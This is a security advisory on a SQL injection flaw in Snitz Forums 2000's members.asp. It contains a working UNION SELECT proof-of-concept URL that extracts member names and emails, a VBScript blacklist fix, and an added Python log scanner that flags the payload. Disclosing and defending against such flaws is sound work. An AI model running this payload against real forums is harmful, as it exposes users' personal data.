COMMAND

    Snitz Forums 2000 remote SQL query manipulation vulnerability

SYSTEMS AFFECTED

    Snitz Forums 2000 version: 3.3, 3.3.01, 3.3.02, 3.3.03

PROBLEM

    acemi posted:

    In the members.asp page, when listing the members with a criteria, the
    input (M_NAME) is not checked for malicious code. As a result, an
    attacker can add an extra SELECT statement to the query with UNION and
    he/she can view any data in the forum's database.

    Proof-of-concept
    ----------------

    Normally, to view the members' list whose membername starts with 'A',
    the members.asp page is used as follows:

    /members.asp?mode=search&M_NAME=A&initial=1&method=

    Use this link to view the vulnerability:

    /members.asp?mode=search&M_NAME=XXXX%25')%20UNION%20SELECT%20MEMBER_ID,%20M_STATUS,%20M_NAME%20%2B%20'/'%20%2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%20M_EMAIL,%20M_COUNTRY,%20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%20M_AIM,%20M_TITLE,%20M_POSTS,%20M_LASTPOSTDATE,%20M_LASTHEREDATE,%20M_DATE,%20M_STATE%20FROM%20FORUM_MEMBERS%20WHERE%20(M_NAME%20LIKE%20'&initial=1&method=

    The MEMBERNAME column will be the MEMBERNAME/EMAIL/ column.

SOLUTION

    To fix this bug, in members.asp, change the following lines:

    SearchName = Request("M_NAME")
    if SearchName = "" then
        SearchName = Request.Form("M_NAME")
    end if

    with:

    if IsValidString(Request("M_NAME")) then
        SearchName = Request("M_NAME")
    end if
    if SearchName = "" then
        if IsValidString(Request.Form("M_NAME")) then
            SearchName = Request.Form("M_NAME")
        end if
    end if

    and in function IsValidString(sValidate) in inc_functions.asp, change
    the following line:

    sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<"

    with:

    sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'"
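To check the fix from the defender's side, the following is an added Python model of the IsValidString() blacklist quoted above (before and after the single quote is appended), plus a scan over constructed log lines that flags members.asp searches whose M_NAME would fail the fixed check. It is example code, not Snitz's VBScript; the "METHOD URL STATUS" log shape and the /default.asp line are constructed for the demonstration.

```python
from urllib.parse import urlsplit, parse_qs

# Blacklist from IsValidString() in inc_functions.asp as quoted in the advisory;
# the fix appends the single quote so the LIKE '...' literal cannot be closed.
INVALID_CHARS_BEFORE = "!#$%^&*()=+{}[]|\\;:/?>,<"
INVALID_CHARS_AFTER = INVALID_CHARS_BEFORE + "'"


def offending_chars(value: str, invalid_chars: str = INVALID_CHARS_AFTER) -> str:
    """Blacklisted characters present in value, sorted; '' when it is clean.
    Python model of the check, not Snitz's own code."""
    return "".join(sorted(set(value) & set(invalid_chars)))


def is_valid_string(value: str, invalid_chars: str = INVALID_CHARS_AFTER) -> bool:
    """True when the value would pass IsValidString() with the given blacklist."""
    return offending_chars(value, invalid_chars) == ""


def m_name_from_url(url: str) -> str:
    """Read M_NAME the way members.asp does: first value, URL-decoded, '' if absent."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("M_NAME", [""])[0]


def scan_log(lines):
    """Flag members.asp requests whose decoded M_NAME fails the fixed check.
    Returns one (line number, decoded M_NAME, offending characters) per hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        parts = line.split(" ")          # constructed "METHOD URL STATUS" shape
        if len(parts) < 2 or "members.asp" not in parts[1].lower():
            continue
        name = m_name_from_url(parts[1])
        bad = offending_chars(name)
        if bad:
            hits.append((n, name, bad))
    return hits


# Constructed log lines: the advisory's normal request, an unrelated page,
# and the advisory's proof-of-concept request.
SAMPLE_LOG = [
    "GET /members.asp?mode=search&M_NAME=A&initial=1&method= 200",
    "GET /default.asp 200",
    "GET /members.asp?mode=search&M_NAME=XXXX%25')%20UNION%20SELECT%20MEMBER_ID,"
    "%20M_STATUS,%20M_NAME%20%2B%20'/'%20%2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,"
    "%20M_EMAIL,%20M_COUNTRY,%20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%20M_AIM,%20M_TITLE,"
    "%20M_POSTS,%20M_LASTPOSTDATE,%20M_LASTHEREDATE,%20M_DATE,%20M_STATE%20FROM"
    "%20FORUM_MEMBERS%20WHERE%20(M_NAME%20LIKE%20'&initial=1&method= 200",
]
```

Note the trade-off the blacklist brings: a legitimate name such as O'Brien passes the old list but is rejected once the quote is added, so the fix should be paired with a user-facing error rather than a silent empty search.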